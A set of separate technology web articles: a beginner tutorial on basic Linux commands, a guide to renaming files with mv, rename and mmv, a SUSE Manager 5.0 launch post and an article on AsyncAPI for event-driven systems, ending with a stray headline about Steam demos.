
28 MOST FREQUENTLY USED BASIC LINUX COMMANDS WITH EXAMPLES


Introduction
In this article we are going to discuss some of the most frequently used basic Linux commands, with examples. It is mainly useful for beginners who have just started to learn Linux or want to learn it. We have included all the basic Linux commands you need to operate a Linux operating system comfortably from the terminal.

So let’s have a look at basic Linux commands with examples
1. List Files & Directories using ls
## ls basic Linux commands with examples
To list files and directories in Linux we can use the ls command. Refer to the command below.

elinuxbook@ubuntu:~$ ls
app Desktop Documents Downloads file.txt Music Pictures Public Templates Videos

List files & directories with important details like permissions, link count, owner, group, size, last modification date and the file or directory name.

elinuxbook@ubuntu:~$ ls -l
total 36
drwxrwxr-x 3 elinuxbook elinuxbook 4096 Aug 20 2017 app
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Desktop
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Documents
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Downloads
-rw-rwxrwx 1 elinuxbook elinuxbook 0 Feb 20 09:40 file.txt
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Music
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Pictures

List Hidden files & directories.

elinuxbook@ubuntu:~$ ls -a
. .bash_history .cache Desktop Downloads .gnupg .lesshst Music .profile .sudo_as_admin_successful .Xauthority
.. .bash_logout .compiz .dmrc file.txt .HipChat .local Pictures Public Templates .xsession-errors
app .bashrc .config Documents .gconf .ICEauthority .mozilla .pki .QtWebEngineProcess Videos .xsession-er




List files & directories with their inode numbers.

elinuxbook@ubuntu:~$ ls -li
total 36
284379 drwxrwxr-x 3 elinuxbook elinuxbook 4096 Aug 20 2017 app
278746 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Desktop
278760 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Documents
278757 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Downloads
134040 -rw-rwxrwx 1 elinuxbook elinuxbook 0 Feb 20 09:40 file.txt
278761 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Music
278762 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Pictures

## Basic Linux commands with examples to Manage Files & Directories
2. Create a Directory in Linux
Create a new directory in Linux using the mkdir command.
elinuxbook@ubuntu:~$ mkdir data

3. Delete a Directory
Delete an empty directory using the rmdir command.

elinuxbook@ubuntu:~$ rmdir data

4. Remove/Delete a file
Delete a file using the rm command.
elinuxbook@ubuntu:~$ rm file.txt

To delete a directory along with its contents, use the rm command with the -rf arguments to remove it recursively and forcefully.
elinuxbook@ubuntu:~$ rm -rf data

## Basic Linux commands with examples to Manage Users

5. Create a New user in Linux
To create a new user in Linux you can use the useradd command. Refer to the command below.
elinuxbook@ubuntu:~$ sudo useradd helpdesk


6. Set Password for a User
Set password for a user using passwd command.

elinuxbook@ubuntu:~$ sudo passwd helpdesk
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

7. Delete a User
Delete a user using userdel command.
elinuxbook@ubuntu:~$ sudo userdel helpdesk

8. Change Permission in Linux
To change permission of files & directories in Linux you can use chmod command. Here I have shown some examples.
Allow Full access (i.e. Read, Write, Execute) to Owner/User for a file file.txt.

elinuxbook@ubuntu:~$ chmod u+rwx file.txt

Remove Write & Execute permission from Owner/User.
elinuxbook@ubuntu:~$ chmod u-wx file.txt

Allow Read, Write, Execute permission to everyone.
elinuxbook@ubuntu:~$ chmod a+rwx file.txt

You can also allow read, write and execute permission to everyone using the numeric (octal) method.

elinuxbook@ubuntu:~$ chmod 777 file.txt
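
In the numeric form, each digit is the sum of read (4), write (2) and execute (1), written for the user, group and others in that order. For example, 644 gives the owner read/write and everyone else read-only access, while 750 gives the owner full access, the group read/execute and others nothing:

elinuxbook@ubuntu:~$ chmod 644 file.txt
elinuxbook@ubuntu:~$ chmod 750 file.txt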

9. Change Ownership of Files & Directories
You can change ownership of files & directories in Linux using chown command. The Syntax to change ownership is :
chown username:groupname filename
Change ownership of a file file.txt.

elinuxbook@ubuntu:~$ sudo chown elinuxbook:helpdesk file.txt

elinuxbook@ubuntu:~$ ls -l file.txt
-rw-rw-r-- 1 elinuxbook helpdesk 0 Feb 21 07:52 file.txt

Change Group Ownership of a file using chown command.
elinuxbook@ubuntu:~$ sudo chown :elinuxbook file.txt

elinuxbook@ubuntu:~$ ls -l file.txt
-rw-rw-r-- 1 elinuxbook elinuxbook 0 Feb 21 07:52 file.txt

## Basic Linux commands with examples for Backup
10. Backup data using Tar
Create an archive in Linux using the tar command.

elinuxbook@ubuntu:~$ tar -cvf file.tar file.txt

Create a Tar archive with gzip compression.
elinuxbook@ubuntu:~$ tar -czvf file.tar.gz file.txt

Extract a gzip compressed Tar archive.
elinuxbook@ubuntu:~$ tar -xzvf file.tar.gz
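
You can also list the contents of an archive without extracting it by using the -t argument:

elinuxbook@ubuntu:~$ tar -tzvf file.tar.gz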

## Basic Linux commands with examples to compress files & directories

11. Compress Files & Directories using gzip command
Compress a file using the gzip command.
elinuxbook@ubuntu:~$ gzip file.txt

Extract a gzip (.gz) compressed file.
elinuxbook@ubuntu:~$ gzip -d file.txt.gz

OR you can also use the gunzip command to extract a gzip compressed file.

elinuxbook@ubuntu:~$ gunzip file.txt.gz
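
Note that gzip removes the original file after compressing it. On recent versions of gzip you can keep the original as well by adding the -k argument:

elinuxbook@ubuntu:~$ gzip -k file.txt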

## Basic Linux commands with examples to Shutdown the System.
12. Shutdown Linux Operating System
To immediately shut down a Linux system you can use the command below.
elinuxbook@ubuntu:~$ shutdown -h now

Shut down the system after 10 minutes.

elinuxbook@ubuntu:~$ shutdown -h +10

Cancel a scheduled shutdown using the shutdown command with the -c argument.
elinuxbook@ubuntu:~$ shutdown -c

Reboot the system after 10 minutes using the shutdown command with the -r argument.
elinuxbook@ubuntu:~$ shutdown -r +10
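
You can also schedule a shutdown for a specific time of day using the 24-hour format, for example at 10 PM:

elinuxbook@ubuntu:~$ shutdown -h 22:00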

13. Compress files & directories using bzip2 compression
Compress a file using the bzip2 command.

elinuxbook@ubuntu:~$ bzip2 test.txt

Extract a bzip2 compressed file (.bz2) using the bzip2 command with the -d argument.
elinuxbook@ubuntu:~$ bzip2 -d test.txt.bz2

14. Copy files in Linux
You can copy files & directories in Linux using the cp command. Here I am copying a file named file.txt into a directory named data. Refer to the command below.
Syntax : cp Source Destination

elinuxbook@ubuntu:~$ cp file.txt data/

15. Move/Rename file in Linux
Move or rename a file in Linux using the mv command.
Syntax : mv Source Filename Destination Filename
elinuxbook@ubuntu:~$ mv file.txt data/myfile.txt

16. Change Directory in Linux
Use the cd command to change directories in Linux. Refer to the command below.

elinuxbook@ubuntu:~$ cd data/

17. Check Current Working Directory
To check the current working directory in Linux you can use the pwd command. pwd stands for Print Working Directory. As you can see below, my current working directory is "/home/elinuxbook".
elinuxbook@ubuntu:~$ pwd
/home/elinuxbook

18. Create a New file
To create a new empty file in Linux you can use the touch command.
elinuxbook@ubuntu:~$ touch file.txt

## Basic Linux commands with examples to check Process Status in Linux

19. Check Process Status in Linux
To check process status in Linux you can use the ps command.
elinuxbook@ubuntu:~$ ps
PID TTY TIME CMD
2936 pts/4 00:00:03 bash
11022 pts/4 00:00:00 ps

The ps command with the -ef argument shows the process status in more detail, including the user ID, process ID, parent process ID, CPU utilization, start time, terminal and command.
elinuxbook@ubuntu:~$ ps -ef | less
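
In practice you will often filter this output for a particular process name, for example:

elinuxbook@ubuntu:~$ ps -ef | grep sshd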

20. List connected Disks/Medias
You can list all connected hard disks, pen drives and other storage devices using the fdisk command with the -l argument. Refer to the command below.

elinuxbook@ubuntu:~$ sudo fdisk -l
Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xa5466322

Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 37750783 37748736 18G 83 Linux
/dev/sda2 37752830 41940991 4188162 2G 5 Extended
/dev/sda5 37752832 41940991 4188160 2G 82 Linux swap / Solaris

## Basic Linux commands with examples to check Mounted Devices in Linux
21. List Mounted Devices in Linux
You can list all mounted filesystems in human-readable format using the df command with the -h argument.
elinuxbook@ubuntu:~$ df -h
Filesystem Size Used Avail Use% Mounted on
udev 966M 0 966M 0% /dev
tmpfs 199M 14M 185M 7% /run
/dev/sda1 18G 4.9G 12G 30% /
tmpfs 992M 212K 992M 1% /dev/shm
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 992M 0 992M 0% /sys/fs/cgroup
tmpfs 199M 64K 199M 1% /run/user/1000

Running df without any arguments lists mounted filesystems with sizes in 1K blocks.

elinuxbook@ubuntu:~$ df
Filesystem 1K-blocks Used Available Use% Mounted on
udev 988812 0 988812 0% /dev
tmpfs 203012 14032 188980 7% /run
/dev/sda1 18447100 5124524 12362476 30% /
tmpfs 1015056 212 1014844 1% /dev/shm
tmpfs 5120 4 5116 1% /run/lock
tmpfs 1015056 0 1015056 0% /sys/fs/cgroup
tmpfs 203012 64 202948 1% /run/user/1000

List mounted filesystems with their inode usage.
elinuxbook@ubuntu:~$ df -ih
Filesystem Inodes IUsed IFree IUse% Mounted on
udev 242K 459 241K 1% /dev
tmpfs 248K 683 248K 1% /run
/dev/sda1 1.2M 228K 925K 20% /
tmpfs 248K 9 248K 1% /dev/shm
tmpfs 248K 6 248K 1% /run/lock
tmpfs 248K 17 248K 1% /sys/fs/cgroup
tmpfs 248K 31 248K 1% /run/user/1000

## Basic Linux commands with examples to check Network Configurations
22. Check IP Address in Linux
To check the IP address in Linux you can use the ifconfig command.

elinuxbook@ubuntu:~$ ifconfig
ens33 Link encap:Ethernet HWaddr 00:0c:29:ff:cd:2e
inet6 addr: 2405:204:f196:72e6:f609:9c3f:ccb7:8841/64 Scope:Global
inet6 addr: 2405:204:f211:47d8:3f17:e549:58e6:254b/64 Scope:Global
inet6 addr: 2405:204:f196:72e6:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: 2405:204:f211:47d8:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: 2405:204:f109:105f:a531:82b3:8d4a:c712/64 Scope:Global
inet6 addr: 2405:204:f109:105f:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: fe80::b396:d285:b5b3:81c3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8909 errors:0 dropped:0 overruns:0 frame:0
TX packets:8903 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:9662594 (9.6 MB) TX bytes:1080952 (1.0 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:61437 errors:0 dropped:0 overruns:0 frame:0
TX packets:61437 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4568449 (4.5 MB) TX bytes:4568449 (4.5 MB)

Use the command below to check the IP address of a particular interface. Here I am checking the IP address of the interface ens33.
elinuxbook@ubuntu:~$ ifconfig ens33
ens33 Link encap:Ethernet HWaddr 00:0c:29:ff:cd:2e
inet6 addr: 2405:204:f196:72e6:f609:9c3f:ccb7:8841/64 Scope:Global
inet6 addr: 2405:204:f211:47d8:3f17:e549:58e6:254b/64 Scope:Global
inet6 addr: 2405:204:f196:72e6:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: 2405:204:f211:47d8:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: 2405:204:f109:105f:a531:82b3:8d4a:c712/64 Scope:Global
inet6 addr: 2405:204:f109:105f:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: fe80::b396:d285:b5b3:81c3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8909 errors:0 dropped:0 overruns:0 frame:0
TX packets:8903 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:9662594 (9.6 MB) TX bytes:1080952 (1.0 MB)
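
Note that ifconfig comes from the older net-tools package and may not be installed by default on newer distributions. The ip command from the iproute2 package reports the same information, for example:

elinuxbook@ubuntu:~$ ip addr show ens33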

## Basic Linux commands with examples for Package Installation.
23. Install Packages in Linux using rpm command
You can use the rpm command to install a package in Linux.

[root@elinuxbook ~]# rpm -ivh dhcp-3.0.5-23.el5.x86_64.rpm
warning: dhcp-3.0.5-23.el5.x86_64.rpm: Header V3 DSA signature: NOKEY, key ID 37017186
Preparing… ########################################### [100%]
1:dhcp ########################################### [100%]

The rpm command with the -qc argument will list the configuration files of a particular package. Here I am listing the configuration files of the vsftpd FTP server package.
[root@elinuxbook ~]# rpm -qc vsftpd
/etc/logrotate.d/vsftpd.log
/etc/pam.d/vsftpd
/etc/vsftpd/ftpusers
/etc/vsftpd/user_list
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd_conf_migrate.sh

Upgrade an installed package to a newer version using the command below.
[root@localhost ~]# rpm -Uvh dhcp-4.1.1-51.P1.el6.centos.x86_64.rpm
Preparing… ########################################### [100%]
1:dhcp ########################################### [100%]

24. Install Package in Linux using yum command
Install a package in Linux using the yum command. Refer to the command below.

[root@elinuxbook ~]# yum install dhcp
Loaded plugins: fastestmirror, refresh-packagekit, security
Setting up Install Process
Loading mirror speeds from cached hostfile
* base: mirror.nbrc.ac.in
* extras: mirrors.nhanhoa.com
* updates: centos-hcm.viettelidc.com.vn
base | 3.7 kB 00:00
extras | 3.4 kB 00:00
updates | 3.4 kB 00:00
Resolving Dependencies
–> Running transaction check
—> Package dhcp.x86_64 12:4.1.1-51.P1.el6.centos will be installed
–> Finished Dependency Resolution

Dependencies Resolved

================================================================================
Package Arch Version Repository Size
================================================================================
Installing:
dhcp x86_64 12:4.1.1-51.P1.el6.centos base 823 k
.
.
Installed:
dhcp.x86_64 12:4.1.1-51.P1.el6.centos

Complete!

You can list installed packages using the command below.
[root@elinuxbook ~]# yum list installed

List the most recently installed packages using the command below.
[root@elinuxbook ~]# yum list recent
Loaded plugins: fastestmirror, refresh-packagekit, security
Loading mirror speeds from cached hostfile
* base: mirror.nbrc.ac.in
* extras: centos-hn.viettelidc.com.vn
* updates: centos-hn.viettelidc.com.vn
Recently Added Packages
openjpeg.x86_64 1.3-16.el6_8 updates
openjpeg-devel.i686 1.3-16.el6_8 updates
openjpeg-devel.x86_64 1.3-16.el6_8 updates
openjpeg-libs.i686 1.3-16.el6_8 updates
openjpeg-libs.x86_64 1.3-16.el6_8 updates
tomcat6.noarch 6.0.24-105.el6_8 updates
tomcat6-admin-webapps.noarch 6.0.24-105.el6_8 updates

25. Check your installed Operating System details using uname command
Running the uname command by itself prints the kernel name of your currently installed operating system.

elinuxbook@ubuntu:~$ uname
Linux

The uname command with the -a argument displays the kernel name, hostname, kernel version, architecture and so on.
elinuxbook@ubuntu:~$ uname -a
Linux ubuntu 4.13.0-32-generic #35~16.04.1-Ubuntu SMP Thu Jan 25 10:13:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

uname command with argument -o will show your operating system type. Here It’s GNU/Linux.
elinuxbook@ubuntu:~$ uname -o
GNU/Linux

## Basic Linux commands with examples to check Network Connectivity.

26. Check Network connectivity in Linux using ping command
You can check network connectivity in Linux using the ping command, which sends ICMP echo request packets. Refer to the command below.
elinuxbook@ubuntu:~$ ping localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.393 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.083 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.091 ms
64 bytes from localhost (127.0.0.1): icmp_seq=4 ttl=64 time=0.091 ms

— localhost ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 3035ms
rtt min/avg/max/mdev = 0.083/0.164/0.393/0.132 ms

Normally the ping command sends packets indefinitely, but you can ask it to send a fixed number of packets using the -c argument. Here I wanted 3 packets, hence I set -c to 3. Refer to the command below.
elinuxbook@ubuntu:~$ ping -c 3 localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.068 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.077 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.091 ms

— localhost ping statistics —
3 packets transmitted, 3 received, 0% packet loss, time 2017ms
rtt min/avg/max/mdev = 0.068/0.078/0.091/0.013 ms

The ping command with the -i argument waits the specified number of seconds between packets. Here I have set the interval to 2 seconds.

elinuxbook@ubuntu:~$ ping -c 3 -i 2 localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.066 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.090 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.091 ms

— localhost ping statistics —
3 packets transmitted, 3 received, 0% packet loss, time 4028ms
rtt min/avg/max/mdev = 0.066/0.082/0.091/0.013 ms

27. Copy files & directories Securely over Network
You can copy files and directories in Linux over network using scp command. scp stands for Secure Copy.
scp root@10.10.0.125:/data/file.txt /root/
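
The command above copies a file from the remote host 10.10.0.125 to the local /root/ directory. You can also copy in the other direction, or copy a whole directory recursively with the -r argument (the paths here are only examples):

scp /root/file.txt root@10.10.0.125:/data/
scp -r /data root@10.10.0.125:/backup/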

28. Securely take a remote console of any system over the network using ssh
Take a remote shell on any system securely using the ssh command. Refer to the command below.
ssh root@10.10.0.125
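
You can also use ssh to run a single command on the remote machine without opening an interactive shell, for example:

ssh root@10.10.0.125 uptime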

Here we have tried to include all the frequently used basic Linux commands with examples. If something is missing, you can let us know in the comment box below.

If you found this article useful then like us, share this post on your preferred social media, subscribe to our newsletter, or if you have something to say then feel free to comment in the comment box below.

How to Rename a File in Linux using mv, rename & mmv


This blog post teaches you how to rename a file in Linux using multiple methods and commands.
Renaming files is a common task in the workday of a system administrator, developer, or regular Linux user. Renaming helps us keep a copy of a file and temporarily use other names while working on a server. The Linux operating system lets you rename files and directories via the GUI, but when we are working on a server that hosts websites, we need to know the most commonly used commands for renaming.

In the next paragraphs we will explain with examples three different commands for renaming files: mv, rename, and mmv.
Prerequisites

A server running Ubuntu 22.04 or any Linux OS (CentOS, Debian, or AlmaLinux)
User privileges: root or non-root user with sudo privileges

Rename a file in Linux using the mv command
The mv command is short for "move" and is one of the most used commands for moving files and directories between different paths. It is also a simple way to rename a file in Linux, which is the purpose of this blog post. The syntax of mv is the following:

mv [OPTION]… [-T] SOURCE DEST
mv [OPTION]… SOURCE… DIRECTORY
mv [OPTION]… -t DIRECTORY SOURCE…

Let’s rename a text file using the mv command. List the content of the current directory:
root@host:/var/www/html# ls -al
total 8
drwxr-xr-x 2 root root 4096 Mar 2 09:41 .
drwxr-xr-x 3 root root 4096 Mar 2 09:13 ..
-rw-r--r-- 1 root root 0 Mar 2 09:41 test.txt

To rename the test.txt file, execute the following command:
mv test.txt test-renamed.txt
List the content of the directory again:
-rw-r--r-- 1 root root 0 Mar 2 09:41 test-renamed.txt
If you go one level up you can rename the html directory as well:
mv html html.backup
The mv command will apply to files and folders:
drwxr-xr-x 2 root root 4096 Mar 2 05:43 html.backup
The next example is to move the file or directory to a different location on your server. Let's move html.backup to a different location:
mv html.backup/ /opt/
List the content of the opt directory:
root@host:/var/www# ls -al /opt/
drwxr-xr-x 2 root root 4096 Mar 2 09:43 html.backup

There are plenty of options that you can use with the mv command, such as the following (a short example follows the list):
-i Prompt before overwriting
-f Overwrite without warning or prompting
-v Show verbose output
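
For example, combining -i and -v prompts before overwriting and confirms what was moved (the file names here are just the ones used above):

mv -iv test-renamed.txt test.txt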

For more information about the mv command, you can check by executing the following command:
man mv
You will get a very long description of the mv command as an output.
Rename a file in Linux using the rename command
To use the rename command, we need to install the rename package first with the following command:
apt install rename
Once installed, you can check the version with the command below:
rename -V
You will get output similar to this:
root@host:# rename -V
/usr/bin/rename using File::Rename version 1.30, File::Rename::Options version 1.10

The syntax for the rename command is the following:
rename [options] 's/[pattern]/[replacement]/' [file name]
Let’s say that we have three different text files:
root@host:/var/www# ls -al
-rw-r--r-- 1 root root 0 Mar 2 10:38 file1.txt
-rw-r--r-- 1 root root 0 Mar 2 10:38 file2.txt
-rw-r--r-- 1 root root 0 Mar 2 10:38 file3.txt

To rename all these files with the rename you need to execute the following command:
rename 's/txt/backup/' *.txt
If you list the content now, you will see the following output:
root@host:/var/www# ls -al
-rw-r--r-- 1 root root 0 Mar 2 10:38 file1.backup
-rw-r--r-- 1 root root 0 Mar 2 10:38 file2.backup
-rw-r--r-- 1 root root 0 Mar 2 10:38 file3.backup
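
Before renaming files in bulk it is often worth doing a dry run; the rename command accepts a -n option that only prints what would be renamed without actually touching the files. For example, to preview renaming the .backup files back to .txt:

rename -n 's/backup/txt/' *.backup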

To know more about the rename command you can execute man rename in your command line.
root@host:# man rename
RENAME(1p) User Contributed Perl Documentation RENAME(1p)

NAME
rename – renames multiple files

SYNOPSIS
rename [ -h|-m|-V ] [ -v ] [ -0 ] [ -n ] [ -f ] [ -d ] [ -u [enc]] [ -e|-E perlexpr]*|perlexpr [ files ]

DESCRIPTION
“rename” renames the filenames supplied according to the rule specified as the first argument. The perlexpr argument is a Perl expression which is expected
to modify the $_ string in Perl for at least some of the filenames specified. If a given filename is not modified by the expression, it will not be
renamed. If no filenames are given on the command line, filenames will be read via standard input.

Examples (Larry Wall, 1992)
For example, to rename all files matching “*.bak” to strip the extension, you might say

rename 's/\.bak$//' *.bak

To translate uppercase names to lower, you’d use

rename 'y/A-Z/a-z/' *

Rename a file in Linux using the mmv command
The mmv command is used for moving, copying, appending, and linking source files to the target file specified with the pattern.
If we want to use the mmv command we need to install the mmv package first.
apt install mmv
The syntax of the mmv command is the following one:
mmv [-m|x|r|c|o|a|l|s] [-h] [-d|p] [-g|t] [-v|n] [--] [from to]
The usage is simple. To rename the file1.backup file back to file1.txt execute the following command:
mmv file1.backup file1.txt
If you want to know more information about this command, you can execute man mmv command in your prompt:
root@host:/var/www# man mmv
MMV(1) General Commands Manual MMV(1)

NAME
mmv – move/copy/append/link multiple files by wildcard patterns

SYNOPSIS
mmv [-m|x|r|c|o|a|l|s] [-h] [-d|p] [-g|t] [-v|n] [--] [from to]

EXAMPLES
Rename all *.jpeg files in the current directory to *.jpg:

mmv '*.jpeg' '#1.jpg'

Replace the first occurrence of abc with xyz in all files in the current directory:

mmv '*abc*' '#1xyz#2'

Rename files ending in .html.en, .html.de, etc. to ending in .en.html, .de.html, etc. in the current directory:

mmv '*.html.??' '#1.#2#3.html'

Swap the first two dash-separated fields in music files named in the form 'first - second - third.ogg' in the current directory:

mmv '* - * - *.ogg' '#2 - #1 - #3.ogg'

That’s it. You successfully renamed files and directories using different methods and commands.
PS. If you liked this post on how to rename files in Linux, please share it with your friends on social networks or simply leave a comment in the comments section. Thank you.

Next Gen Mixed Linux Management


Today is a special day at SUSE: We are launching the next generation of SUSE Manager – SUSE Manager 5.0. You might be thinking that SUSE Manager has been around forever. While that is true, this release of SUSE Manager really is special – the server is now being delivered in a container image running on Podman. This is not only a generational leap for SUSE Manager but will bring multiple benefits to you.
In this blog, we’ll focus on just three of the reasons why you should consider SUSE Manager 5.0 for multi Linux management in your data center.

Containerization for resilience, simplification and flexibility
With this release of SUSE Manager, the SUSE Manager Server is now a container – providing all the benefits that containerization brings – chief among them resilience and simplicity. Containerization brings two main benefits to you:

Decouples the SUSE Manager Server from the underlying operating system. This is important because it lets your admins take advantage of the newest features of SUSE Manager as we roll them out without worrying about what effects they will have on the operating system.
Resiliency in case of failure. Should the SUSE Manager server fail for any reason, containerization makes it incredibly easy to recover. All your admins have to do is spin up another container and reattach the database. This frees your admins up to do higher level tasks.

Native Enterprise Linux support to improve mixed Linux management
SUSE Manager supports a number of Enterprise Linux distributions, including RHEL, Rocky and Alma Linux, CentOS and, of course, SUSE Liberty Linux. SUSE Manager 5.0 now has native AppStream package management support. Why is this important? Because your admins no longer have to do complicated work to get patches:

Appstream repos are properly parsed
Metadata is now understood by SUMA 5
There is no need to “flatten” the repos
dnf and SUMA agree

You can look for additional enhancements to follow in upcoming releases. Because with SUSE Manager, we really do make good on our promise of “We make Linux, but manage many.”
Enhanced features providing even greater security
With 60% of cyberattacks caused by unpatched servers, and the average cost of a data breach in 2024 estimated at $4.5 million (a 12% increase from 2020), cyberattacks are not only financially costly but also lead to customer mistrust.
SUSE Manager is known for automated patch management providing security and compliance. With this release, we enhance our security posture. SUSE Manager 5.0 provides:

Improved CVE scans including integrated OVAL data.
Use as an attestation server for specific servers for proven confidential computing

SUSE Manager is proven open source mixed Linux IT management.  Now that you’ve gotten a glimpse into SUSE Manager 5.0, we invite you to:

As always, we want to know what you think!

Bridging Design and Runtime Gaps: AsyncAPI in Event-Driven Architecture


The AsyncAPI specification emerged in response to the growing need for a standardized and comprehensive framework that addresses the challenges of designing and documenting asynchronous APIs. It is a collaborative effort of leading tech companies, open source communities, and individual contributors who actively participated in the creation and evolution of the AsyncAPI specification.

Various approaches exist for implementing asynchronous interactions and APIs, each tailored to specific use cases and requirements. Despite this diversity, these approaches fundamentally share a common baseline of key concepts. Whether it’s messaging queues, event-driven architectures, or other asynchronous paradigms, the overarching principles remain consistent. 

Leveraging this shared foundation, AsyncAPI taps into a spectrum of techniques, providing developers with a unified understanding of essential concepts. This strategic approach not only fosters interoperability but also enhances flexibility across various asynchronous implementations, delivering significant benefits to developers.

The design time and runtime refer to distinct phases in the lifecycle of an event-driven system, each serving distinct purposes:

Design time: This phase occurs during the design and development of the event-driven system, where architects and developers plan and structure the system engaging in activities around:

Designing event flows

Schema definition

Topic or channel design

Error handling and retry policies

Security considerations

Versioning strategies

Metadata management

Testing and validation

Documentation

Collaboration and communication

Performance considerations

Monitoring and observability

The design phase yields assets, including a well-defined and configured messaging infrastructure. This encompasses components such as brokers, queues, topics/channels, schemas, and security settings, all tailored to meet specific requirements. The nature of these assets may vary based on the choice of the messaging system.

Runtime: This phase occurs when the system is in operation, actively processing events based on the design-time configurations and settings, responding to triggers in real time.

Dynamic event routing

Concurrency management

Scalability adjustments

Load balancing

Distributed tracing

Alerting and notification

Adaptive scaling

Monitoring and troubleshooting

Integration with external systems

The output of this phase is the ongoing operation of the messaging platform, with messages being processed, routed, and delivered to subscribers based on the configured settings.

AsyncAPI plays a pivotal role in the asynchronous API design and documentation. Its significance lies in standardization, providing a common and consistent framework for describing asynchronous APIs. AsyncAPI details crucial aspects such as message formats, channels, and protocols, enabling developers and stakeholders to understand and integrate with asynchronous systems effectively. 

It should also be noted that the AsyncAPI specification serves as more than documentation; it becomes a communication contract, ensuring clarity and consistency in the exchange of messages between different components or services. Furthermore, AsyncAPI facilitates code generation, expediting the development process by offering a starting point for implementing components that adhere to the specified communication patterns.

In essence, AsyncAPI helps bridge the gap between design-time decisions and the practical implementation and operation of systems that rely on asynchronous communication.

Let’s explore a scenario involving the development and consumption of an asynchronous API, coupled with a set of essential requirements:

Designing an asynchronous API in an event-driven architecture (EDA):

Define the events, schema, and publish/subscribe permissions of an EDA service

Expose the service as an asynchronous API

Generating AsyncAPI specification:

Use the AsyncAPI standard to generate a specification of the asynchronous API

Utilizing GitHub for storage and version control:

Check in the AsyncAPI specification into GitHub, leveraging it as both a storage system and a version control system

Configuring GitHub workflow for document review:

Set up a GitHub action designed to review pull requests (PRs) related to changes in the AsyncAPI document

If changes are detected, initiate a validation process

Upon a successful review and PR approval, proceed to merge the changes

Synchronize the updated API design with the design time

This workflow ensures that design-time and runtime components remain in sync consistently. The feasibility of this process is grounded in the use of the AsyncAPI for the API documentation. Additionally, the AsyncAPI tooling ecosystem supports validation and code generation that makes it possible to keep the design time and runtime in sync.
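
As a small illustration of what the validation step in such a GitHub action might run (assuming the AsyncAPI CLI is the tool wired into the workflow, and that the specification is stored as asyncapi.yaml in the repository):

npm install -g @asyncapi/cli
asyncapi validate asyncapi.yaml

A non-zero exit code from the validate command fails the check, so an invalid document never gets merged.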

Let us consider Solace Event Portal as the tool for building an asynchronous API and Solace PubSub+ Broker as the messaging system. 

An event portal is a cloud-based event management tool that helps in designing EDAs. In the design phase, the portal facilitates the creation and definition of messaging structures, channels, and event-driven contracts. Leveraging the capabilities of Solace Event Portal, we model the asynchronous API and share the crucial details, such as message formats, topics, and communication patterns, as an AsyncAPI document.

We can further enhance this process by providing REST APIs that allow for the dynamic updating of design-time assets, including events, schemas, and permissions. GitHub actions are employed to import AsyncAPI documents and trigger updates to the design-time assets. 

The synchronization between design-time and runtime components is made possible by adopting AsyncAPI as the standard for documenting asynchronous APIs. The AsyncAPI tooling ecosystem, encompassing validation and code generation, plays a pivotal role in ensuring the seamless integration of changes. This workflow guarantees that any modifications to the AsyncAPI document efficiently translate into synchronized adjustments in both design-time and runtime aspects. 

Keeping the design time and runtime in sync is essential for a seamless and effective development lifecycle. When the design specifications closely align with the implemented runtime components, it promotes consistency, reliability, and predictability in the functioning of the system. 

The adoption of the AsyncAPI standard is instrumental in achieving a seamless integration between the design-time and runtime components of asynchronous APIs in EDAs. The use of AsyncAPI as the standard for documenting asynchronous APIs, along with its robust tooling ecosystem, ensures a cohesive development lifecycle. 

The effectiveness of this approach extends beyond specific tools, offering a versatile and scalable solution for building and maintaining asynchronous APIs in diverse architectural environments.

Author: Post contributed by Giri Venkatesan, Solace

Valve gives developers some big reasons to add a demo on Steam


